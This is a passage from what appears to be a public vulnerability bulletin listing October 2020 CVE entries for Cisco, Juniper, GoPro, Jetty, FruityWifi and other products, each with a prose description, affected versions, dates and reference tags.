A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. The vulnerability is due to improper input validation of the parameters of an HTTP request. An attacker could exploit this vulnerability by intercepting an HTTP request from a user. A successful exploit could allow the attacker to modify the HTTP request to cause the interface to redirect the user to a specific, malicious URL. This type of vulnerability is known as an open redirect attack and is used in phishing attacks that get users to unknowingly visit malicious sites. 2020-10-21 not yet calculated CVE-2020-3558
CISCO
cisco — firepower_threat_defense_software
 
A vulnerability in the multi-instance feature of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to escape the container for their Cisco FTD instance and execute commands with root privileges in the host namespace. The attacker must have valid credentials on the device.The vulnerability exists because a configuration file that is used at container startup has insufficient protections. An attacker could exploit this vulnerability by modifying a specific container configuration file on the underlying file system. A successful exploit could allow the attacker to execute commands with root privileges within the host namespace. This could allow the attacker to impact other running Cisco FTD instances or the host Cisco FXOS device. 2020-10-21 not yet calculated CVE-2020-3514
CISCO
cisco — firepower_threat_defense_software
 
A vulnerability in the Simple Network Management Protocol (SNMP) input packet processor of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly. The vulnerability is due to a lack of sufficient memory management protections under heavy SNMP polling loads. An attacker could exploit this vulnerability by sending a high rate of SNMP requests to the SNMP daemon through the management interface on an affected device. A successful exploit could allow the attacker to cause the SNMP daemon process to consume a large amount of system memory over time, which could then lead to an unexpected device restart, causing a denial of service (DoS) condition. This vulnerability affects all versions of SNMP. 2020-10-21 not yet calculated CVE-2020-3533
CISCO
cisco — fxos_software
 
A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute commands on the underlying operating system with root privileges. 2020-10-21 not yet calculated CVE-2020-3457
CISCO
cisco — fxos_software
 
A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute commands on the underlying operating system with root privileges. 2020-10-21 not yet calculated CVE-2020-3459
CISCO
cisco — fxos_software
 
A vulnerability in the secure boot process of Cisco FXOS Software could allow an authenticated, local attacker to bypass the secure boot mechanisms. The vulnerability is due to insufficient protections of the secure boot process. An attacker could exploit this vulnerability by injecting code into a specific file that is then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device which would be executed at each boot and maintain persistence across reboots. 2020-10-21 not yet calculated CVE-2020-3455
CISCO
cisco — multiple_products Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured File Policy for HTTP. The vulnerability is due to incorrect detection of modified HTTP packets used in chunked responses. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass a configured File Policy for HTTP packets and deliver a malicious payload. 2020-10-21 not yet calculated CVE-2020-3299
CISCO
comtrend — ar-5387un_routers
 
A cross-site scripting (XSS) vulnerability on Comtrend AR-5387un devices with A731-410JAZ-C04_R02.A2pD035g.d23i firmware allows remote attackers to inject arbitrary web script or HTML via the Service Description parameter while creating a WAN service. 2020-10-23 not yet calculated CVE-2018-8062
MISC
crmeb — crmeb
 
A SSRF vulnerability exists in the downloadimage interface of CRMEB 3.0, which can remotely download arbitrary files on the server and remotely execute arbitrary code. 2020-10-23 not yet calculated CVE-2020-25466
MISC
MISC
MISC
crossbeam — crossbeam
 
Crossbeam is a set of tools for concurrent programming. In crossbeam-channel before version 0.4.4, the bounded channel incorrectly assumes that `Vec::from_iter` has allocated capacity that same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when `Vec::from_iter` has allocated different sizes with the number of iterator elements. This has been fixed in crossbeam-channel 0.4.4. 2020-10-16 not yet calculated CVE-2020-15254
MISC
MISC
CONFIRM
MISC
cryptopro — csp
 
CryptoPro CSP through 5.0.0.10004 on 32-bit platforms allows Local Privilege Escalation (by local users with the SeChangeNotifyPrivilege right) because user-mode input is mishandled during process creation. An attacker can write arbitrary data to an arbitrary location in the kernel’s address space. 2020-10-23 not yet calculated CVE-2020-9331
MISC
cryptopro — csp
 
CryptoPro CSP through 5.0.0.10004 on 64-bit platforms allows local users with the SeChangeNotifyPrivilege right to cause denial of service because user-mode input is mishandled during process creation. 2020-10-23 not yet calculated CVE-2020-9361
MISC
dedetech — dedecms
 
A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages. 2020-10-22 not yet calculated CVE-2020-27533
MISC
domainmod — domainmod
 
DomainMOD before 4.14.0 uses MD5 without a salt for password storage. 2020-10-20 not yet calculated CVE-2019-9080
MISC
eclipse — jetty
 
In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2O, on Unix like systems, the system’s temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability. 2020-10-23 not yet calculated CVE-2020-27216
CONFIRM
CONFIRM
elasticsearch — elasticsearch
 
Elasticsearch versions before 6.8.13 and 7.9.2 contain a document disclosure flaw when Document or Field Level Security is used. Search queries do not properly preserve security permissions when executing certain complex queries. This could result in the search disclosing the existence of documents the attacker should not be able to view. This could result in an attacker gaining additional insight into potentially sensitive indices. 2020-10-22 not yet calculated CVE-2020-7020
MISC
MISC
excast — pro_ii
 
In EZCast Pro II, the administrator password md5 hash is provided upon a web request. This hash can be cracked to access the administration panel of the device. 2020-10-16 not yet calculated CVE-2019-12305
MISC
eyoucms — eyoucms
 
A CSRF vulnerability in Eyoucms v1.2.7 allows an attacker to add an admin account via login.php. 2020-10-22 not yet calculated CVE-2020-18129
MISC
fastd — fastd
 
receive.c in fastd before v21 allows denial of service (assertion failure) when receiving packets with an invalid type code. 2020-10-22 not yet calculated CVE-2020-27638
MISC
MISC
MISC
fortinet — fortios
 
A cleartext storage of sensitive information vulnerability in FortiOS command line interface in versions 6.2.4 and below may allow an authenticated attacker to obtain sensitive information such as users passwords by connecting to FortiGate CLI and executing the “diag sys ha checksum show” command. 2020-10-21 not yet calculated CVE-2020-6648
CONFIRM
freebox — freebox_server
 
A DNS rebinding vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3. 2020-10-19 not yet calculated CVE-2020-24375
CONFIRM
MISC
fritz!os — fritz!os
 
FRITZ!OS before 7.21 on FRITZ!Box devices allows a bypass of a DNS Rebinding protection mechanism. 2020-10-23 not yet calculated CVE-2020-26887
MISC
MISC
MISC
fruitywifi — fruitywifi
 
A Cross-Site Request Forgery (CSRF) vulnerability is identified in FruityWifi through 2.4. Due to a lack of CSRF protection in page_config_adv.php, an unauthenticated attacker can lure the victim to visit his website by social engineering or another attack vector. Due to this issue, an unauthenticated attacker can change the newSSID and hostapd_wpa_passphrase. 2020-10-23 not yet calculated CVE-2020-24847
MISC
fruitywifi — fruitywifi
 
FruityWifi through 2.4 has an unsafe Sudo configuration [(ALL : ALL) NOPASSWD: ALL]. This allows an attacker to perform a system-level (root) local privilege escalation, allowing an attacker to gain complete persistent access to the local system. 2020-10-23 not yet calculated CVE-2020-24848
MISC
fs.com — s3900_24t4s
 
An issue was discovered in fs.com S3900 24T4S 1.7.0 and earlier. The form does not have an authentication or token authentication mechanism that allows remote attackers to forge requests on behalf of a site administrator to change all settings including deleting users, creating new users with escalated privileges. 2020-10-22 not yet calculated CVE-2020-24033
MISC
MISC
ghisler — total_commander
 
An issue was discovered in Ghisler Total Commander 9.51. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the %SYSTEMDRIVE%totalcmdTOTALCMD64.EXE binary. 2020-10-21 not yet calculated CVE-2020-17381
MISC
gitlab — runner
 
An issue has been discovered in GitLab Runner affecting all versions starting from 13.4.0 before 13.4.2, all versions starting from 13.3.0 before 13.3.7, all versions starting from 13.2.0 before 13.2.10. Insecure Runner Configuration in Kubernetes Environments 2020-10-22 not yet calculated CVE-2020-13327
CONFIRM
MISC
gopro — gpmf-parser
 
GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_Decompress(). Parsing malicious input can result in a crash. 2020-10-19 not yet calculated CVE-2020-16160
MISC
MISC
gopro — gpmf-parser
 
GoPro gpmf-parser 1.5 has a heap out-of-bounds read and segfault in GPMF_ScaledData(). Parsing malicious input can result in a crash or information disclosure. 2020-10-19 not yet calculated CVE-2020-16159
MISC
MISC
gopro — gpmf-parser
 
GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_ScaledData(). Parsing malicious input can result in a crash. 2020-10-19 not yet calculated CVE-2020-16161
MISC
MISC
MISC
hashicorp — nomad_and_nomad_enterprise
 
HashiCorp Nomad and Nomad Enterprise version 0.9.0 up to 0.12.5 client file sandbox feature can be subverted using either the template or artifact stanzas. Fixed in 0.12.6, 0.11.5, and 0.10.6 2020-10-22 not yet calculated CVE-2020-27195
CONFIRM
MISC
huawei — e-6878-370
 
E6878-370 versions 10.0.3.1(H557SP27C233),10.0.3.1(H563SP21C233) and E6878-870 versions 10.0.3.1(H557SP27C233),10.0.3.1(H563SP11C233) have a denial of service vulnerability. The system does not properly check some events, an attacker could launch the events continually, successful exploit could cause reboot of the process. 2020-10-19 not yet calculated CVE-2020-9111
MISC
huawei — taurus-an00b
 
Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a privilege elevation vulnerability. Due to lack of privilege restrictions on some of the business functions of the device. An attacker could exploit this vulnerability to access the protecting information, resulting in the elevation of the privilege. 2020-10-19 not yet calculated CVE-2020-9112
MISC
imagemagik — imagemagick
 
ImageMagick 7.0.10-34 allows Division by Zero in OptimizeLayerFrames in MagickCore/layer.c, which may cause a denial of service. 2020-10-22 not yet calculated CVE-2020-27560
MISC
jboss — eap
 
A flaw was found in JBoss EAP, where the authentication configuration is set-up using a legacy SecurityRealm, to delegate to a legacy PicketBox SecurityDomain, and then reloaded to admin-only mode. This flaw allows an attacker to perform a complete authentication bypass by using an arbitrary user and password. The highest threat to vulnerability is to system availability. 2020-10-16 not yet calculated CVE-2020-14299
MISC
juniper_networks — ex2300_series_devices On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command: user@host> show chassis routing-engine Routing Engine status: … Idle 2 percent the “Idle” value shows as low (2 % in the example above), and also the following command: user@host> show system processes summary … PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND 11639 root 52 0 283M 11296K select 12:15 44.97% eventd 11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc} the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1668
CONFIRM
juniper_networks — ex4300_series_devices On Juniper Networks EX4300 Series, receipt of a stream of specific IPv4 packets can cause Routing Engine (RE) high CPU load, which could lead to network protocol operation issue and traffic interruption. This specific packets can originate only from within the broadcast domain where the device is connected. This issue occurs when the packets enter to the IRB interface. Only IPv4 packets can trigger this issue. IPv6 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS on EX4300 series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1670
MISC
juniper_networks — junos_os On Juniper Networks Junos OS devices configured with DHCPv6 relay enabled, receipt of a specific DHCPv6 packet might crash the jdhcpd daemon. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of specific crafted DHCP messages will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. Only DHCPv6 packet can trigger this issue. DHCPv4 packet cannot trigger this issue. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1672
CONFIRM
juniper_networks — junos_os A stack buffer overflow vulnerability in the device control daemon (DCD) on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service (DoS) against the daemon or execute arbitrary code in the system with root privilege. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2. Versions of Junos OS prior to 17.3 are unaffected by this vulnerability. 2020-10-16 not yet calculated CVE-2020-1664
CONFIRM
juniper_networks — junos_os The system console configuration option ‘log-out-on-disconnect’ In Juniper Networks Junos OS Evolved fails to log out an active CLI session when the console cable is disconnected. This could allow a malicious attacker with physical access to the console the ability to resume a previous interactive session and possibly gain administrative privileges. This issue affects all Juniper Networks Junos OS Evolved versions after 18.4R1-EVO, prior to 20.2R1-EVO. 2020-10-16 not yet calculated CVE-2020-1666
CONFIRM
juniper_networks — junos_os Receipt of a specifically malformed NDP packet sent from the local area network (LAN) to a device running Juniper Networks Junos OS Evolved can cause the ndp process to crash, resulting in a Denial of Service (DoS). The process automatically restarts without intervention, but a continuous receipt of the malformed NDP packets could leaded to an extended Denial of Service condition. During this time, IPv6 neighbor learning will be affected. The issue occurs when parsing the incoming malformed NDP packet. Rather than simply discarding the packet, the process asserts, performing a controlled exit and restart, thereby avoiding any chance of an unhandled exception. Exploitation of this vulnerability is limited to a temporary denial of service, and cannot be leveraged to cause additional impact on the system. This issue is limited to the processing of IPv6 NDP packets. IPv4 packet processing cannot trigger, and is unaffected by this vulnerability. This issue affects all Juniper Networks Junos OS Evolved versions prior to 20.1R2-EVO. Junos OS is unaffected by this vulnerability. 2020-10-16 not yet calculated CVE-2020-1681
CONFIRM
juniper_networks — junos_os
 
When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process might be bypassed due to a race condition. Due to this vulnerability, mspmand process, responsible for managing “URL Filtering service”, can crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2. 2020-10-16 not yet calculated CVE-2020-1667
MISC
juniper_networks — junos_os
 
Insufficient Cross-Site Scripting (XSS) protection in Juniper Networks J-Web and web based (HTTP/HTTPS) services allows an unauthenticated attacker to hijack the target user’s HTTP/HTTPS session and perform administrative actions on the Junos device as the targeted user. This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled such as J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP). Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device> show system processes | match http 5260 – S 0:00.13 /usr/sbin/httpd-gk -N 5797 – I 0:00.10 /usr/sbin/httpd –config /jail/var/etc/httpd.conf In order to successfully exploit this vulnerability, the attacker needs to convince the device administrator to take action such as clicking the crafted URL sent via phishing email or convince the administrator to input data in the browser console. This issue affects Juniper Networks Junos OS: 18.1 versions prior to 18.1R3-S1; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1. 2020-10-16 not yet calculated CVE-2020-1673
CONFIRM
juniper_networks — junos_os
 
When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing “URL Filtering service”, may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This vulnerability might allow an attacker to cause an extended Denial of Service (DoS) attack against the device and to cause clients to be vulnerable to DNS based attacks by malicious DNS servers when they send DNS requests through the device. As a result, devices which were once protected by the DNS Filtering service are no longer protected and at risk of exploitation. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2. 2020-10-16 not yet calculated CVE-2020-1660
CONFIRM
juniper_networks — junos_os
 
An input validation vulnerability exists in Juniper Networks Junos OS, allowing an attacker to crash the srxpfe process, causing a Denial of Service (DoS) through the use of specific maintenance commands. The srxpfe process restarts automatically, but continuous execution of the commands could lead to an extended Denial of Service condition. This issue only affects the SRX1500, SRX4100, SRX4200, NFX150, NFX250, and vSRX-based platforms. No other products or platforms are affected by this vulnerability. This issue affects Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D220 on SRX1500, SRX4100, SRX4200, vSRX; 17.4 versions prior to 17.4R3-S3 on SRX1500, SRX4100, SRX4200, vSRX; 18.1 versions prior to 18.1R3-S11 on SRX1500, SRX4100, SRX4200, vSRX, NFX150; 18.2 versions prior to 18.2R3-S5 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.1 versions prior to 19.1R3-S2 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.2 versions prior to 19.2R1-S5, 19.2R3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250. This issue does not affect Junos OS 19.3 or any subsequent version. 2020-10-16 not yet calculated CVE-2020-1682
CONFIRM
juniper_networks — junos_os
 
Juniper Networks Junos OS and Junos OS Evolved fail to drop/discard delayed MACsec packets (e.g. delayed by more than 2 seconds). Per the specification, called the “bounded receive delay”, there should be no replies to delayed MACsec packets. Any MACsec traffic delayed more than 2 seconds should be dropped and late drop counters should increment. Without MACsec delay protection, an attacker could exploit the delay to spoof or decrypt packets. This issue affects: Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8, 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved: all versions prior to 19.4R3-EVO; 20.1 versions prior to 20.1R2-EVO. This issue does not affect Junos OS versions prior to 16.1R1. 2020-10-16 not yet calculated CVE-2020-1674
MISC
CONFIRM
MISC
juniper_networks — junos_os
 
The DHCPv6 Relay-Agent service, part of the Juniper Enhanced jdhcpd daemon shipped with Juniper Networks Junos OS has an Improper Input Validation vulnerability which will result in a Denial of Service (DoS) condition when a DHCPv6 client sends a specific DHPCv6 message allowing an attacker to potentially perform a Remote Code Execution (RCE) attack on the target device. Continuous receipt of the specific DHCPv6 client message will result in an extended Denial of Service (DoS) condition. If adjacent devices are also configured to relay DHCP packets, and are not affected by this issue and simply transparently forward unprocessed client DHCPv6 messages, then the attack vector can be a Network-based attack, instead of an Adjacent-device attack. No other DHCP services are affected. Receipt of the packet without configuration of the DHCPv6 Relay-Agent service, will not result in exploitability of this issue. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95; 14.1X53 versions prior to 14.1X53-D53; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D44; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2. 2020-10-16 not yet calculated CVE-2020-1656
CONFIRM
MISC
MISC
MISC
juniper_networks — junos_os
 
On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash with a core dump if a malformed DHCPv6 packet is received, resulting with the restart of the daemon. This issue only affects DHCPv6, it does not affect DHCPv4. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.2 version 19.2R2 and later versions; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2; This issue does not affect Juniper Networks Junos OS prior to 17.4R1. 2020-10-16 not yet calculated CVE-2020-1671
CONFIRM
juniper_networks — junos_os
 
On Juniper Networks Junos OS devices configured as a DHCP forwarder, the Juniper Networks Dynamic Host Configuration Protocol Daemon (jdhcp) process might crash when receiving a malformed DHCP packet. This issue only affects devices configured as DHCP forwarder with forward-only option, that forward specified DHCP client packets, without creating a new subscriber session. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of the malformed DHCP packet will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. This issue can be triggered only by DHCPv4, it cannot be triggered by DHCPv6. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D105 on SRX Series; 14.1X53 versions prior to 14.1X53-D60 on EX and QFX Series; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230 on SRX Series; 15.1X53 versions prior to 15.1X53-D593 on EX2300/EX3400; 16.1 versions prior to 16.1R7-S5. 2020-10-16 not yet calculated CVE-2020-1661
CONFIRM
juniper_networks — junos_os
 
On Juniper Networks Junos OS and Junos OS Evolved devices, BGP session flapping can lead to a routing process daemon (RPD) crash and restart, limiting the attack surface to configured BGP peers. This issue only affects devices with BGP damping in combination with accepted-prefix-limit configuration. When the issue occurs the following messages will appear in the /var/log/messages: rpd[6046]: %DAEMON-4-BGP_PREFIX_THRESH_EXCEEDED: XXXX (External AS x): Configured maximum accepted prefix-limit threshold(1800) exceeded for inet6-unicast nlri: 1984 (instance master) rpd[6046]: %DAEMON-3-BGP_CEASE_PREFIX_LIMIT_EXCEEDED: 2001:x:x:x::2 (External AS x): Shutting down peer due to exceeding configured maximum accepted prefix-limit(2000) for inet6-unicast nlri: 2001 (instance master) rpd[6046]: %DAEMON-4: bgp_rt_maxprefixes_check_common:9284: NOTIFICATION sent to 2001:x:x:x::2 (External AS x): code 6 (Cease) subcode 1 (Maximum Number of Prefixes Reached) AFI: 2 SAFI: 1 prefix limit 2000 kernel: %KERN-5: mastership_relinquish_on_process_exit: RPD crashed on master RE. Sending SIGUSR2 to chassisd (5612:chassisd) to trigger RE switchover This issue affects: Juniper Networks Junos OS: 17.2R3-S3; 17.3 version 17.3R3-S3 and later versions, prior to 17.3R3-S8; 17.4 version 17.4R2-S4, 17.4R3 and later versions, prior to 17.4R2-S10, 17.4R3-S2; 18.1 version 18.1R3-S6 and later versions, prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions, prior to 18.2R3-S4; 18.2X75 version 18.2X75-D50, 18.2X75-D60 and later versions, prior to 18.2X75-D53, 18.2X75-D65; 18.3 version 18.3R2 and later versions, prior to 18.3R2-S4, 18.3R3-S2; 18.4 version 18.4R2 and later versions, prior to 18.4R2-S5, 18.4R3-S2; 19.1 version 19.1R1 and later versions, prior to 19.1R2-S2, 19.1R3-S1; 19.2 version 19.2R1 and later versions, prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved prior to 20.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R3-S3. 2020-10-16 not yet calculated CVE-2020-1662
CONFIRM
juniper_networks — junos_os_and_junos_os_evolved
 
On Juniper Networks Junos OS and Junos OS Evolved platforms with EVPN configured, receipt of specific BGP packets causes a slow memory leak. If the memory is exhausted the rpd process might crash. If the issue occurs, the memory leak could be seen by executing the “show task memory detail | match policy | match evpn” command multiple times to check if memory (Alloc Blocks value) is increasing. root@device> show task memory detail | match policy | match evpn ———————— Allocator Memory Report ———————— Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes Policy EVPN Params 20 24 3330678 79936272 3330678 79936272 root@device> show task memory detail | match policy | match evpn ———————— Allocator Memory Report ———————— Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes Policy EVPN Params 20 24 36620255 878886120 36620255 878886120 This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R2; 20.1 versions prior to 20.1R1-S4, 20.1R2; Juniper Networks Junos OS Evolved: 19.4 versions; 20.1 versions prior to 20.1R1-S4-EVO, 20.1R2-EVO; 20.2 versions prior to 20.2R1-EVO; This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO. 2020-10-16 not yet calculated 